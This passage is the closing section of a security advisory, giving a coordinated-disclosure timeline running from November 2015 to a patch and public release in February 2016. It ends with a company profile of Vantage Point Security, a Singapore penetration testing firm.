Vulnerabilities discovered 06 November 2015 - Vendor acknowledged and scheduled fixes to commence 02 February 2016 - Patch released by vendor 10 February 2016 - Release of this advisory to the public About Vantage Point Security: ----------------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg
×